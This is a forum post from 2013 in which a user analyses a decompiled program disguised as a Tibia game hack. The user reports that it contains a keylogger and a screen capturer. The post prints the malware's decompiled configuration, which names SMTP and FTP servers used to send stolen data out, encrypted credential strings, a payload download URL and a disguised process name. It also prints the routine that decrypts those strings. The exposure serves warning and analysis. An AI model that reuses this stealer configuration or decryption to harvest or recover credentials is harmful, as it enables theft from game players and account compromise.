Blahhh
12-12-2013, 11:05 AM
yup this containts keylogger, screen capturer and all the other shit you can imagine
decompiled it and found some encrypted strings which probably decrypts to his email/password/ftp etc:
Shared Sub New()
Module1.Field_12 = False
Module1.Field_18 = False
Module1.Field_10 = False
Module1.Field_11 = False
Module1.Field_9 = False
Module1.ΨεΔΧΛσ = False
Module1.Field_7 = "20"
Module1.ζσπκβμ = "AaD"
Module1.ΡΥτΔςω = 4
Module1.Field_23 = "ιΥηΨ"
Module1.Field_19 = "CurrentUser"
Module1.Field_17 = "χδΙΓδΟ"
Module1.Field_16 = "kgUofWkudc"
Module1.βτξΦΙε = "iexplorer.exe"
Module1.Field_14 = "+SDDate+"
Module1.Field_6 = False
Dim sArr1 As String() = New string() { _
"Tibia", _
"Tibia client do not match (xp000000256) error", _
"16" }
Module1.Message = sArr1
Module1.μΓνθψΠυΝ = "+DelOff+"
Module1.ΠΓπΨξΞζς = False
Module1.ΖΧεΣιψπτ = True
Module1.ΔΩνΤνδΓΗ = False
Module1.Field_4 = "10"
Module1.Field_21 = False
Module1.οΒΚΖΣΛΖς = "QDdzMaIZMQ"
Module1.θΠΠΝΝΤ = False
Module1.Field_13 = "http://www.exampleserver.com/directfile.exe"
Module1.Field_3 = False
Module1.ΡδΠΔενψ = "Lighthack.exe"
Module1.Field_20 = True
Module1.ΟΗΝαΕΞγα = False
Module1.ΒεηΟΟμμσ = "uLKyKkBLOQQmiHVo96CGxw=="
Module1.Field_26 = "ftp.drivehq.com"
Module1.Field_15 = "uLKyKkBLOQQmiHVo96CGxw=="
Module1.Field_5 = ""
Module1.ωΕνξθξε = "smtp.gmail.com"
Module1.Field_22 = "4ag2dH0fb2q2Bfu4SJcDCBv+VUpWO7KWECYo0WNzB8a5L4+8Ty e48w=="
Module1.νΛΣΥΥθι = "57WaTtjpcHU1yZogYRNd9mOKAAsI9d7UgYrPe8Tyag8="
Module1.ΤθΙΗωΠξ = "4ag2dH0fb2q2Bfu4SJcDCBv+VUpWO7KWECYo0WNzB8a5L4+8Ty e48w=="
Module1.ΛΚζιγγΦ = "587"
Module1.ΣμΣυΤψτ = "Active Window:"
Module1.ΔΗυιλΕο = "- Project Neptune"
Module1.χςςΔΔΚΜ = True
Module1.ΦςΣΕΙΥΒ = True
Module1.τΩαΟΥΠΛ = True
Module1.Field_24 = True
Module1.KeyboardHandle = CType(0, IntPtr)
Module1.LastCheckedForegroundTitle = ""
Module1.callback = Nothing
End Sub
Also found the decrypt function.
Public Shared Function ΓΠζαδΔ(ByVal value As String, ByVal key As String) As String
Dim s1 As String
Dim tripleDESCryptoServiceProvider1 As TripleDESCryptoServiceProvider = New TripleDESCryptoServiceProvider
tripleDESCryptoServiceProvider1.IV = New byte(8) {}
Dim passwordDeriveBytes1 As PasswordDeriveBytes = New PasswordDeriveBytes(key, New byte(0) {})
tripleDESCryptoServiceProvider1.Key = passwordDeriveBytes1.CryptDeriveKey("RC2", "MD5", 128, New byte(8) {})
Dim bArr1 As Byte() = Convert.FromBase64String(value)
Dim memoryStream1 As MemoryStream = New MemoryStream(value.Length)
Dim cryptoStream1 As CryptoStream = New CryptoStream(memoryStream1, tripleDESCryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Write)
cryptoStream1.Write(bArr1, 0, CInt(bArr1.Length))
cryptoStream1.FlushFinalBlock()
Dim bArr2 As Byte() = New byte((CInt((memoryStream1.Length - CLng(1))) + 1)) {}
memoryStream1.Position = CLng(0)
memoryStream1.Read(bArr2, 0, CInt(memoryStream1.Length))
cryptoStream1.Close()
Return Encoding.UTF8.GetString(bArr2)
End Function
Powered by vBulletin® Version 4.2.5 Copyright © 2024 vBulletin Solutions Inc. All rights reserved.